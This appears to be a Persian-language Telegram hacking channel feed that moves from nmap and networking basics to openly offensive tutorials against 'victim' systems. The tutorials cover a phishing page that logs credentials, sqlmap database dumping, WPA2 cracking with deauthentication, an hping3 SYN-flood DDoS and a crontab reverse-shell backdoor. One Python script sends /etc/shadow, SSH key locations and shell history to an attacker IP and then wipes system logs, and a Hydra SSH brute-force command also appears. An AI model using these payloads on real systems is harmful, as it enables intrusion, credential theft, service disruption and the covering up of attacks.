📡 Nmap: قدرتمندترین ابزار اسکن شبکه
نصب: sudo apt install nmap
کاربردیترین کامندها:
🔹 sudo nmap -sS 192.168.1.0/24 → SYN Scan سریع
🔹 sudo nmap -sV 192.168.1.10 → تشخیص سرویس و ورژن
🔹 sudo nmap -O 192.168.1.10 → تشخیص سیستمعامل
🔹 sudo nmap -sC -sV -p- 192.168.1.10 → اسکن کامل
🎯 -sC اسکریپتهای پیشفرض را اجرا میکند (یافتن آسیبپذیری)
#کاربردی #Nmap
نصب: sudo apt install nmap
کاربردیترین کامندها:
🔹 sudo nmap -sS 192.168.1.0/24 → SYN Scan سریع
🔹 sudo nmap -sV 192.168.1.10 → تشخیص سرویس و ورژن
🔹 sudo nmap -O 192.168.1.10 → تشخیص سیستمعامل
🔹 sudo nmap -sC -sV -p- 192.168.1.10 → اسکن کامل
🎯 -sC اسکریپتهای پیشفرض را اجرا میکند (یافتن آسیبپذیری)
#کاربردی #Nmap
1❤5
آشنایی با IP Address و CIDR
🌐 IPv4 = ۳۲ بیت → ۴ بخش ۸ بیتی (مثال: 192.168.1.10)
🌐 IPv6 = ۱۲۸ بیت → هنوز در ایران کمتر استفاده میشود
📐 CIDR Notation:
192.168.1.0/24 → subnet mask 255.255.255.0 → ۲۵۶ آدرس
192.168.0.0/16 → ۶۵۵۳۶ آدرس
10.0.0.0/8 → ۱۶ میلیون آدرس
🎯 در پنتس: برای محدوده هدف، از CIDR استفاده کنید:
nmap -sn 192.168.1.0/24
#آموزشی #IP #CIDR
🌐 IPv4 = ۳۲ بیت → ۴ بخش ۸ بیتی (مثال: 192.168.1.10)
🌐 IPv6 = ۱۲۸ بیت → هنوز در ایران کمتر استفاده میشود
📐 CIDR Notation:
192.168.1.0/24 → subnet mask 255.255.255.0 → ۲۵۶ آدرس
192.168.0.0/16 → ۶۵۵۳۶ آدرس
10.0.0.0/8 → ۱۶ میلیون آدرس
🎯 در پنتس: برای محدوده هدف، از CIDR استفاده کنید:
nmap -sn 192.168.1.0/24
#آموزشی #IP #CIDR
⚡19❤1
ARP Protocol چیست؟
🔗 ARP (Address Resolution Protocol):
تبدیل IP به MAC Address
سناریو: کامپیوتر A میخواهد با 192.168.1.20 ارتباط بگیرد
1️⃣ ARP Request: "کی مالک IP 192.168.1.20 است؟"
2️⃣ ARP Reply: "من هستم، MAC من aa:bb:cc:dd:ee:ff است"
🔥 حمله ARP Spoofing: هکر پاسخ جعلی میدهد → ترافیک به ماشین هکر هدایت میشود
🛡️ راهکار: ARP Inspection در سوئیچهای مدیریتی
#آموزشی #ARP
🔗 ARP (Address Resolution Protocol):
تبدیل IP به MAC Address
سناریو: کامپیوتر A میخواهد با 192.168.1.20 ارتباط بگیرد
1️⃣ ARP Request: "کی مالک IP 192.168.1.20 است؟"
2️⃣ ARP Reply: "من هستم، MAC من aa:bb:cc:dd:ee:ff است"
🔥 حمله ARP Spoofing: هکر پاسخ جعلی میدهد → ترافیک به ماشین هکر هدایت میشود
🛡️ راهکار: ARP Inspection در سوئیچهای مدیریتی
#آموزشی #ARP
⚡18🔥1
Fishlocaltest.py
5.1 KB
Pydroid 3 رو نصب کن
پکیج Flask رو نصب کن:
دکمه ☰ (منو) → Pip → توی کادر بنویس flask → Install
کد بالا رو کامل کپی کن و توی یه فایل جدید پیست کن (مثلاً phish.py)
دکمه ▶ (Run) رو بزن
نتیجه: یه صفحه لاگین شبیه سایتهای واقعی باز میشه. هر چی توش بنویسی، توی فایل credentials.txt ذخیره میشه و همون لحظه توی ترمینال نشون داده میشه
صرفا این برای کسایی که نمیدونن صفحه جعلی(فیشینگ) چیه برای همین میتونن با این ابزار این رو درک کنین
یک اسکریپت خوب هم برای فیشینگ میدم
امیدوارم تو راه درست استفاده کنین
پکیج Flask رو نصب کن:
دکمه ☰ (منو) → Pip → توی کادر بنویس flask → Install
کد بالا رو کامل کپی کن و توی یه فایل جدید پیست کن (مثلاً phish.py)
دکمه ▶ (Run) رو بزن
نتیجه: یه صفحه لاگین شبیه سایتهای واقعی باز میشه. هر چی توش بنویسی، توی فایل credentials.txt ذخیره میشه و همون لحظه توی ترمینال نشون داده میشه
صرفا این برای کسایی که نمیدونن صفحه جعلی(فیشینگ) چیه برای همین میتونن با این ابزار این رو درک کنین
یک اسکریپت خوب هم برای فیشینگ میدم
امیدوارم تو راه درست استفاده کنین
⚡21❤1👍1
https://github.com/htr-tech/zphisher/tree/master?search=1
افراد مبتدی میتونن از زد فیشر برای فیشینگ استفاده کنن
کامل آموزش نصب رو داخل گیت هاب گذاشته هم برای گوشی هم برای کالی
افراد مبتدی میتونن از زد فیشر برای فیشینگ استفاده کنن
کامل آموزش نصب رو داخل گیت هاب گذاشته هم برای گوشی هم برای کالی
GitHub
zphisher/ at master · htr-tech/zphisher
An automated phishing tool with 30+ templates. This Tool is made for educational purpose only ! Author will not be responsible for any misuse of this toolkit ! - htr-tech/zphisher
⚡21❤2
آموزش SQL Injection اتوماتیک با SQLmap
نصب: apt install sqlmap
اگه رو یوزر روت su نیستید sudo بزنید اول کد نصب، اینا آسونه نیازی به گفتن نیست گفتم شاید مبتدی داخل باشه. 🌷
🔹 تشخیص و استخراج دیتابیس:
این ابزار عالیه خودش آسیبپذیری را پیدا و بهرهبرداری میکند.
#SQLmap #SQLInjection #آموزشی #ℳℴ𝒷𝒾𝓃
نصب: apt install sqlmap
اگه رو یوزر روت su نیستید sudo بزنید اول کد نصب، اینا آسونه نیازی به گفتن نیست گفتم شاید مبتدی داخل باشه. 🌷
🔹 تشخیص و استخراج دیتابیس:
sqlmap -u "http://target.com/page.php?id=1" --dbs
sqlmap -u "http://target.com/page.php?id=1" -D dbname --tables
sqlmap -u "http://target.com/page.php?id=1" -D dbname -T users --dump
این ابزار عالیه خودش آسیبپذیری را پیدا و بهرهبرداری میکند.
#SQLmap #SQLInjection #آموزشی #ℳℴ𝒷𝒾𝓃
⚡17❤2🔥2
هک وایفای (WPA2) با aircrack-ng
✍ نکته تکمیلی: فقط wordlist.txt یادتون نره رو وایفای همسایه هم تست نکنید. 😂
#aircrack_ng #WPA2 #آموزشی #ℳℴ𝒷𝒾𝓃
sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon
sudo airodump-ng -c 6 --bssid TARGET_MAC -w capture wlan0mon
sudo aireplay-ng -0 5 -a TARGET_MAC wlan0mon
sudo aircrack-ng -w wordlist.txt capture-01.cap
✍ نکته تکمیلی: فقط wordlist.txt یادتون نره رو وایفای همسایه هم تست نکنید. 😂
#aircrack_ng #WPA2 #آموزشی #ℳℴ𝒷𝒾𝓃
⚡16🔥2❤1
https://github.com/mrnullhack/RDP_CRACK
گفتم بی انصافی میکنم تو حق کرکر های عزیز
اینم ی ابزار خوب و خفن برای شما
آموزش استفاده کامل توی گیت هاب داده شده حتما بعد استفاده نظر خودتون رو با ما در اشتراک بزارید
گفتم بی انصافی میکنم تو حق کرکر های عزیز
اینم ی ابزار خوب و خفن برای شما
آموزش استفاده کامل توی گیت هاب داده شده حتما بعد استفاده نظر خودتون رو با ما در اشتراک بزارید
⚡19🔥2👎1
حمله DDoS با hping3
پورت 80 سایت رو با SYN Flood نابود میکنه
#hping3_DDoS #آموزشی #ℳℴ𝒷𝒾𝓃
hping3 -S --flood -p 80 target.com
پورت 80 سایت رو با SYN Flood نابود میکنه
#hping3_DDoS #آموزشی #ℳℴ𝒷𝒾𝓃
⚡19❤3🔥2
بکدور دائمی تو سیستم قربانی است:
حتما باید رو سیستم خودتون شنود زده باشید مثل کد زیر
بعد سیستم اون بدبخت هم اینو اجرا کنید:
حالا چی میشه؟
یه cron job به سیستم قربانی اضافه میکنه که هر ۱ ساعت، یه شل معکوس به سیستم تو میفرسته و رو ترمینال میاد که حتی اگه سیستم ریاستارت بشه، این کار باقی میماند.
اگه میخواید زودتر از ۱ ساعت شل بگیرید، این رو اجرا کنید:
این یعنی هر دقیقه شل میفرسته
#SHELL #آموزشی #ℳℴ𝒷𝒾𝓃
حتما باید رو سیستم خودتون شنود زده باشید مثل کد زیر
nc -lvnp 5555
بعد سیستم اون بدبخت هم اینو اجرا کنید:
echo "0 */1 * * * bash -i >& /dev/tcp/123.456.7.8/5555 0>&1" >> /etc/crontab
حالا چی میشه؟
یه cron job به سیستم قربانی اضافه میکنه که هر ۱ ساعت، یه شل معکوس به سیستم تو میفرسته و رو ترمینال میاد که حتی اگه سیستم ریاستارت بشه، این کار باقی میماند.
اگه میخواید زودتر از ۱ ساعت شل بگیرید، این رو اجرا کنید:
(crontab -l; echo "* * * * * bash -i >& /dev/tcp/123.456.7.8/5555 0>&1") | crontab -
این یعنی هر دقیقه شل میفرسته
#SHELL #آموزشی #ℳℴ𝒷𝒾𝓃
⚡18❤1👍1🔥1
اصول اطلاعاتجمعی (Reconnaissance) 🔹
#آموزشی #Reconnaissance🎯 ۶۰٪ موفقیت در پنتست به اطلاعاتجمعی بستگی دارد!
دو نوع:🟢 Passive Reconnaissance (بدون تماس مستقیم)
- Google Dorking
- Whois lookup
- LinkedIn/Shodan🔴 Active Reconnaissance (تماس مستقیم با هدف)
- Nmap scan
- DNS enumeration
- Directory fuzzing✅ قانون طلایی: اول Passive، بعد Active!
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡17❤2🔥1
DarkPacket
برای عضویت پیام بدین @net_activenull
دوره کاملا از دیشب پر شده ممنون میشم تا دوره های بعدی صبر کنین اصلا جا نیست ممنون
⚡16🔥3
کد شل معکوس بد گرفتن شل:
چیکار میکنه این کد؟
همه اطلاعات حیاتی مثل هش پسورد، کلید SSH، تاریخچه فرمانها، کاربران، کرونجاب ها براتون میاد بعدش خودش همه لاگها رو پاک میکنه. هیچ ردی نمیمونه.
خوب حالا چطوریه؟
اول باید یه شنود اوکی کنید رو سیستم:
تموم حالا این اسکریپت رو روی سیستم اون بدبخت بزن:
فقط آیپی خودتون رو یادتون باشه ویرایش کنید و بزنید.
همین دیگه تمام چیز خاصی نداره. 🌷
#SHELL #آموزشی #ℳℴ𝒷𝒾𝓃
چیکار میکنه این کد؟
همه اطلاعات حیاتی مثل هش پسورد، کلید SSH، تاریخچه فرمانها، کاربران، کرونجاب ها براتون میاد بعدش خودش همه لاگها رو پاک میکنه. هیچ ردی نمیمونه.
خوب حالا چطوریه؟
اول باید یه شنود اوکی کنید رو سیستم:
nc -lvnp 4444
تموم حالا این اسکریپت رو روی سیستم اون بدبخت بزن:
#!/usr/bin/env python3
# Silent Killer - Post-Exploitation Script
# بعد از گرفتن شل، اینو اجرا کن
import os
import subprocess
import socket
import time
ATTACKER_IP = "192.168.1.5"
ATTACKER_PORT = 4444
def exfiltrate(data):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ATTACKER_IP, ATTACKER_PORT))
sock.send(data.encode())
sock.close()
except:
pass
def grab_all():
# ۱. استخراج همه هشهای پسورد
hashes = subprocess.check_output("cat /etc/shadow 2>/dev/null || echo 'no shadow'", shell=True)
exfiltrate(f"[SHADOW]\n{hashes.decode()}")
# ۲. استخراج کلیدهای SSH
ssh_keys = subprocess.check_output("find / -name 'id_rsa' -o -name 'id_dsa' 2>/dev/null | head -20", shell=True)
exfiltrate(f"[SSH_KEYS]\n{ssh_keys.decode()}")
# ۳. استخراج تاریخچه شل
history = subprocess.check_output("cat ~/.bash_history 2>/dev/null || echo 'no history'", shell=True)
exfiltrate(f"[HISTORY]\n{history.decode()}")
# ۴. استخراج اطلاعات شبکه
network = subprocess.check_output("ifconfig 2>/dev/null || ip addr 2>/dev/null", shell=True)
exfiltrate(f"[NETWORK]\n{network.decode()}")
# ۵. استخراج کاربران
users = subprocess.check_output("cat /etc/passwd 2>/dev/null | grep '/bin/bash'", shell=True)
exfiltrate(f"[USERS]\n{users.decode()}")
# ۶. استخراج کرونجابها
crons = subprocess.check_output("cat /etc/crontab 2>/dev/null; crontab -l 2>/dev/null", shell=True)
exfiltrate(f"[CRONS]\n{crons.decode()}")
def wipe_logs():
# پاک کردن ردپا
subprocess.call("rm -rf /var/log/* 2>/dev/null", shell=True)
subprocess.call("history -c 2>/dev/null", shell=True)
subprocess.call("unset HISTFILE 2>/dev/null", shell=True)
subprocess.call("rm -f ~/.bash_history 2>/dev/null", shell=True)
exfiltrate("[+] Logs wiped")
if __name__ == "__main__":
grab_all()
wipe_logs()
exfiltrate("[+] DONE - All data extracted")
فقط آیپی خودتون رو یادتون باشه ویرایش کنید و بزنید.
همین دیگه تمام چیز خاصی نداره. 🌷
#SHELL #آموزشی #ℳℴ𝒷𝒾𝓃
🔥4❤1
حمله به سرور SSH با Hydra (کرک پسورد)
-l root یوزرنیم هدف
-P rockyou.txt لیست پسورد
بعد از چند دقیقه اگر ضعیف باشه پسوردش درمیاد البته به پسوردلیست شما و تارگت بستگی داره، مثلا تارگت روسی سعی کنید پسورد لیست روسی هم تست کنید و...
پسورد لیست دارید؟ با ریاکشن [👍/👎] بگید 🌷
#SSH #Hydra #آموزشی #ℳℴ𝒷𝒾𝓃
hydra -l root -P rockyou.txt ssh://target.com
-l root یوزرنیم هدف
-P rockyou.txt لیست پسورد
بعد از چند دقیقه اگر ضعیف باشه پسوردش درمیاد البته به پسوردلیست شما و تارگت بستگی داره، مثلا تارگت روسی سعی کنید پسورد لیست روسی هم تست کنید و...
پسورد لیست دارید؟ با ریاکشن [👍/👎] بگید 🌷
#SSH #Hydra #آموزشی #ℳℴ𝒷𝒾𝓃
⚡17👎5👍3